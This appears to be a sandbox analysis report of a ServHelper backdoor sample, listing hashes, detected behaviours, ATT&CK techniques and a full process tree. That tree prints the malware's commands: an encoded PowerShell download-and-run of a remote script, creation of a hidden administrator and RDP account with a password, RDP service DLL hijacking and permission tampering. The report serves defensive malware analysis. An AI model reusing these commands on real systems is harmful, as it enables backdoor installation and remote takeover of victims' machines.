servhelper | c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90

Analysis

max time kernel
132s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10-04-2024 14:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe
Size

7.0MB
MD5

f19b9d6b74f65125623613a334baba76
SHA1

8b1428daa9a7d2231663784c2e0457034dbdd468
SHA256

c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90
SHA512

f993b7002c952cc754d86726031052fde8dcdda6ce29b35aca9f8318e390c86b370f2519cb4ec2374e24645772ef6dfbbb4bcf25c49587e4b5d678588c5a3fd4
SSDEEP

196608:9gwCUo86gyVJHh22fiIUrKqJGZdwInqqwgrSPn:9pv6g+JHhu1WVZdwIqqdr

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2320 powershell.exe
6 2320 powershell.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

744 icacls.exe
1132 icacls.exe
660 takeown.exe
1512 icacls.exe
2988 icacls.exe
2796 icacls.exe
2808 icacls.exe
2112 icacls.exe

flow	pid	process
5	2320	powershell.exe
6	2320	powershell.exe

pid	process
744	icacls.exe
1132	icacls.exe
660	takeown.exe
1512	icacls.exe
2988	icacls.exe
2796	icacls.exe
2808	icacls.exe
2112	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

1044
1044
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

2112 icacls.exe
744 icacls.exe
1132 icacls.exe
660 takeown.exe
1512 icacls.exe
2988 icacls.exe
2796 icacls.exe
2808 icacls.exe

pid	process
1044
1044

pid	process
2112	icacls.exe
744	icacls.exe
1132	icacls.exe
660	takeown.exe
1512	icacls.exe
2988	icacls.exe
2796	icacls.exe
2808	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 raw.githubusercontent.com
5 raw.githubusercontent.com
6 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LFUDE79EPF7EZKWHGT17.temp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2416 WMIC.exe

pid	process
2416	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0ce4479508bda01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2256 reg.exe
Runs net.exe

pid	process
2256	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3020	powershell.exe
2464	powershell.exe
1464	powershell.exe
2660	powershell.exe
3020	powershell.exe
3020	powershell.exe
3020	powershell.exe
2320	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

468
1044
1044
1044
1044

pid	process
468
1044
1044
1044
1044

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	2464	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	2660	powershell.exe
Token: SeRestorePrivilege	2988	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2416	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2416	WMIC.exe
Token: SeAuditPrivilege	2416	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2416	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2416	WMIC.exe
Token: SeAuditPrivilege	2416	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2684	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2684	WMIC.exe
Token: SeAuditPrivilege	2684	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2684	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2684	WMIC.exe
Token: SeAuditPrivilege	2684	WMIC.exe
Token: SeDebugPrivilege	2320	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	process	target process
PID 2772 wrote to memory of 3020	2772	c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe	powershell.exe
PID 2772 wrote to memory of 3020	2772	c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe	powershell.exe
PID 2772 wrote to memory of 3020	2772	c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe	powershell.exe
PID 3020 wrote to memory of 2944	3020	powershell.exe	csc.exe
PID 3020 wrote to memory of 2944	3020	powershell.exe	csc.exe
PID 3020 wrote to memory of 2944	3020	powershell.exe	csc.exe
PID 2944 wrote to memory of 2704	2944	csc.exe	cvtres.exe
PID 2944 wrote to memory of 2704	2944	csc.exe	cvtres.exe
PID 2944 wrote to memory of 2704	2944	csc.exe	cvtres.exe
PID 3020 wrote to memory of 2464	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 2464	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 2464	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 1464	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 1464	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 1464	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 2660	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 2660	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 2660	3020	powershell.exe	powershell.exe
PID 3020 wrote to memory of 660	3020	powershell.exe	takeown.exe
PID 3020 wrote to memory of 660	3020	powershell.exe	takeown.exe
PID 3020 wrote to memory of 660	3020	powershell.exe	takeown.exe
PID 3020 wrote to memory of 1512	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 1512	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 1512	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2988	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2988	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2988	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2796	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2796	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2796	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2808	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2808	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2808	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2112	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2112	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2112	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 744	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 744	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 744	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 1132	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 1132	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 1132	3020	powershell.exe	icacls.exe
PID 3020 wrote to memory of 2292	3020	powershell.exe	reg.exe
PID 3020 wrote to memory of 2292	3020	powershell.exe	reg.exe
PID 3020 wrote to memory of 2292	3020	powershell.exe	reg.exe
PID 3020 wrote to memory of 2256	3020	powershell.exe	reg.exe
PID 3020 wrote to memory of 2256	3020	powershell.exe	reg.exe
PID 3020 wrote to memory of 2256	3020	powershell.exe	reg.exe
PID 3020 wrote to memory of 440	3020	powershell.exe	reg.exe
PID 3020 wrote to memory of 440	3020	powershell.exe	reg.exe
PID 3020 wrote to memory of 440	3020	powershell.exe	reg.exe
PID 3020 wrote to memory of 2140	3020	powershell.exe	net.exe
PID 3020 wrote to memory of 2140	3020	powershell.exe	net.exe
PID 3020 wrote to memory of 2140	3020	powershell.exe	net.exe
PID 2140 wrote to memory of 600	2140	net.exe	net1.exe
PID 2140 wrote to memory of 600	2140	net.exe	net1.exe
PID 2140 wrote to memory of 600	2140	net.exe	net1.exe
PID 3020 wrote to memory of 1656	3020	powershell.exe	cmd.exe
PID 3020 wrote to memory of 1656	3020	powershell.exe	cmd.exe
PID 3020 wrote to memory of 1656	3020	powershell.exe	cmd.exe
PID 1656 wrote to memory of 2128	1656	cmd.exe	cmd.exe
PID 1656 wrote to memory of 2128	1656	cmd.exe	cmd.exe
PID 1656 wrote to memory of 2128	1656	cmd.exe	cmd.exe
PID 2128 wrote to memory of 2028	2128	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe
"C:\Users\Admin\AppData\Local\Temp\c7cb1cc9a2148e8db293de61d791cbbe7202eda89335c93caf454028a61d0a90.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3020
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2-mldfjn.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2944
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7E4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA7E3.tmp"
      4⤵
      PID:2704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2464
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1464
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2660
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:660
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1512
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2988
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2796
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2808
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2112
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:744
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1132
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2292
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:2256
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:440
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2140
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:600
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2128
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:2028
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:2792
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:2036
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:1504
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:892
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:876
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:572
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2376

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:1668
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:2236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:1816

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc DhcSvJI0 /add
1⤵
PID:2260
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc DhcSvJI0 /add
  2⤵
  PID:2852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc DhcSvJI0 /add
    3⤵
    PID:1392

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:2996
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:1488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:2160

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD
1⤵
PID:2840
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD
  2⤵
  PID:1568
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" KXIPPCKF$ /ADD
    3⤵
    PID:1688

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2940
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:3052

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc DhcSvJI0
1⤵
PID:2156
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc DhcSvJI0
  2⤵
  PID:2272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc DhcSvJI0
    3⤵
    PID:1636

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2560
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2416

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2708
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2684

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2604
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2-mldfjn.dll

Filesize
3KB

MD5
48a7bd710c23b05ac5ed1501b72cafc3

SHA1
de8ea26d3b921542cd9e62b56f8bfc0e95244903

SHA256
38ed33261d6c4df69c523b3b7ae178938095f1272d6cb6efe00437279343b9d7

SHA512
e1bf899302a010050c8fbec005418eadcff509c44caa3b208c016fd804676938a734d1618c4692f16bf29df8846702f1adee5d47de38317b68f9e830e64cb190

Download Submit
C:\Users\Admin\AppData\Local\Temp\2-mldfjn.pdb

Filesize
7KB

MD5
7877645b743b086b260a2fd513157dc9

SHA1
98e44e88b0de7cf1c275712cab5e57f9bd056a79

SHA256
0e5b3547391614ec9f993d3e2420a5aa2ef2ffd70679052ebda480907a791bb1

SHA512
de87ebb09cffe1600c3dfa2c5e7c9f2e5641c5cdc9f47a486994c93b9133302b588dffdff1c213ad3311ae910a6ad3b76a44c3fdae187b1d5818db10f1683bb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA7E4.tmp

Filesize
1KB

MD5
b9dc7fbff1dd8dc9cd1bc8b85da0dfbb

SHA1
9f243e6d49cfb33c226f39ed330bde651cf0c993

SHA256
575e789877ffdef8802ad067829ff9d77105ea617d27d1407ba2bf02deb1f921

SHA512
d7c80cc05706a5124e33d46bdaaeeb208b05015dc8bba621f097aac619c57edf2c8862994a982bac1aabdc935da8d83846f5a4c16687aedb297c99930f7e33bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
267dcb46e91e0272aab1994b2cf3c9d8

SHA1
7904af5372cec88161ce77f474d2e5deb119821e

SHA256
c319e5b97653ef90e065aaac0c0ad5d2d3a2bfa3de4ccb6abe16d9437b941a21

SHA512
44c76b401ded2501a18e624b95599945768b58f0c04cd500b4713231b19657352f11c16a0abf5dab18403db162aa07c7f55404beacf86da73dad83cea969cdf8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2f740227e0ba041e02a822410031c104

SHA1
85368de0e24a2b3c8b411780ce69ee936c0b28b9

SHA256
c423be5b14a61e853a464c81f5df6973d657b7a32192330d15d942b5cd71a9ac

SHA512
cc228571599bd8fb471536c78e2eba58bb8786ca186501f852d8d8ee96b46aba2692a593419390b03d1e5b7bed9710beaa50e634194e7efd2bb6d81018410fcf

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2-mldfjn.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2-mldfjn.cmdline

Filesize
309B

MD5
0e44284d1c8b3b8e9a0ba796963527ab

SHA1
47fc782d534ef98c4ff520dca899bc98a0ce332a

SHA256
df8a1644c7959410e4fe3e57e797294159ee12f8f8c13f2b2c890bccd5a1dc7f

SHA512
b2a8dedc531ba0e6779ec20d3a435f6a7447dd86cefa5d3061e88853a988b6830490057bed9023087c115e141eca2084217e85f3935115ce43f3d034de7d79e6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA7E3.tmp

Filesize
652B

MD5
1bde6727fbc4a1433e6cc676652dc420

SHA1
a3fb27bf8773fe71b1c943a7aac18568d7a8d7aa

SHA256
f99a133f23ba5b91711e6814d971d058da32ec3ca260e409c0866e6c51e63b72

SHA512
9ba406eb3e8da0bfa6d2ac1f952f60a8b85667af1e3932cb91a51f35096b159fb438a82683f717c005fc4a0e6212e1b919fc2284c3f12c639e2be9c5ff64a6fa

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
c678a2362862a3207f41213684b4923c

SHA1
d33bd5dd67c81d7da3582eeab75702ae9d0d4bf8

SHA256
18b4505916f75075a71d5d94e9fcd18e5e283690f3e6f06f8a3cb4c4d557dc76

SHA512
a4dc8c2fd294433016cf88a9b830940c78ecec0b600d4f2480a1bf68a3817160e188bc1c06e913bf475ed90021bf464ed9cdf1a7ce53977c12c6679650f37a53

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
22d3d81009b0fbcc977658e4a392c17c

SHA1
1f3f415cb3493bcb02fff0368f2f4a4bc91b8bc1

SHA256
